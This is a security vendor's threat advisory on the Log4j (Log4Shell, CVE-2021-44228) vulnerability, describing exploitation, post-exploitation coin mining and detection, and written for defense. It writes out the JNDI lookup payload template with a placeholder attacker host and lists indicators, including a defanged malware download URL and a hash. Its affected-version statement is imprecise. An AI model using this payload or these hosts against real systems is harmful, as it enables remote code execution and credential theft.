Threat Advisory: Log4j vulnerability (LOG 4 SHELL CVE-2021-44228)

REPORT

SANS 2021 Ransomware Detection and Incident Response Report

In this report, we will address ransomware attacks head-on. These are a different type of attack and thus require that we approach incident detection and response differently.

Read Now

Periodic scans or flow log analysis may not be sufficient for detection or triage of log4j attack. Continuous and runtime analysis of cloud activity and network activity is essential.
– Dr. Saumitra Das, CTO, Blue Hexagon

Overview

Blue Hexagon Labs has confirmed that a disclosed vulnerability in log4j (CVE-2021-44228) is being actively exploited in the wild. The ease with which this vulnerability can be exploited and weaponized makes it a critical issue. Reports in the wild point to exploitation being seen several days prior to the widespread publication of the exploit. As a result, attackers may have already gained a significant foothold in victim environments. While the initial exploitation will start from external-facing public assets, there are likely to be many internal appliances or software that use log4j that could lead to lateral movement. This vulnerability is easy to exploit and Minecraft servers have been exploited using messages in a chat. The exploit can also be used to read environment variables that can lead to credentials leaks (e.g AWS keys) which can also be used for lateral movement.

Who is impacted

Servers running versions of Apache Log4j below 2.14.1; the vulnerability does not appear to impact servers running Apache version below 2.00.

Conditions conducive to an attack

Vulnerable version of log4j
Exposed endpoint running log4j that will accept string based exploit payload and execute

How does it work

Probe attempts from the attacker to identify exposed endpoints
Attempts will be made over multiple protocols
Once an exposed endpoint is identified, a crafted string containing ${jndi:ldap://attackersIPaddress/ExploitPayload} will result in the targeted server calling a remote malicious server with a crafted payload. This attack technique is commonly referred to as RCE

NOTE: Even though we have used LDAP in the example above, the attack is protocol-agnostic and has been seen on multiple protocols in the wild such as HTTP, DNS, and with other modifications to evade signature rules such as separating the protocol name letters with modifiers.

Following initial access, post exploitation has initially focused on installing coin mining ELF binaries on compromised servers. However, since log4j is so widely used in applications and several IT hardware and software products, attackers could move laterally deeper into a target’s environment over time. Over time, we expect other malware that can be used for information leakage, disruption or ransomware to be utilized as well. Microsoft is already seeing attempts to install Cobalt Strike to enable credential theft and lateral movement as well as data exfiltration.
The exploit can also be used to read server environment variables. So, credentials like Git and AWS keys can be stolen without even getting full remote code execution. These credentials can then be used to gain lateral access to other assets. Monitoring cloud API and network activity is an important part of post-exploitation detection and threat hunting.

Blue Hexagon Coverage

Blue Hexagon can help with detection as well as threat hunting for initial access as well as post-exploitation behavior associated with log4j. Monitoring HTTP traffic for exploitation attempts and downloads of post-exploitation payloads is critical.

Initial access detection requires continuous analysis of network requests to external-facing assets in your environment. Cloud instances deployed as honeypots for log4j have quickly been exploited and infected with coin-mining malware.

Post exploitation currently appear to be attempts to exploit servers to install unauthorized coin mining malware. We expect this to escalate to lateral movement using stolen credentials or direct network access to internal assets running log4j.

Blue Hexagon provides continuous monitoring of your cloud activity and network communication and goes beyond simple flow logs to enable detection and hunting of post-exploitation activity.

Blue Hexagon deep learning models have coverage on the payloads being used in the wild such as ELF binaries for coin mining and other types of information-stealing malware that are likely to be used for which no signatures exist.
An example post-exploitation shell script from pastebin [download] shows attempts to kill competing mining services followed by downloads of malware over HTTP.

BIN_MD5=“648effa354b3cbaad87b45f48d59c616”

BIN_DOWNLOAD_URL=“hxxp://45.137.155.55/kinsing”

BIN_DOWNLOAD_URL2=“hxxp://45.137.155.55/kinsing”

Deep learning models can detect malicious code being downloaded onto affected servers in this manner even when the attacker mutates them to create variants of the IP addresses and the actual malware itself.

We strongly recommend customers immediately review their environment for impacted versions of the software called out above and patch to the latest version starting from the external-facing assets to the other important internal assets as well.

We are monitoring the events closely to ensure that we maximize coverage, detection and protection.

Is BlueHexagon Vulnerable?

No, Blue Hexagon’s security software does not use log4j nor does it have any open network accessibility and is not intended to be deployed with external network access. Blue Hexagon’s Detection and Threat Hunting portal does not use log4j.

References and Useful IOCs

Azure Sentinel IOCs – List of IP addresses associated with exploitation behavior
Abuse IOCs – List of payload URLs, payload hashes and botnet C2
IPs attempting log4j RCE
Example execution sequence from exploit, second stage shell script to final malware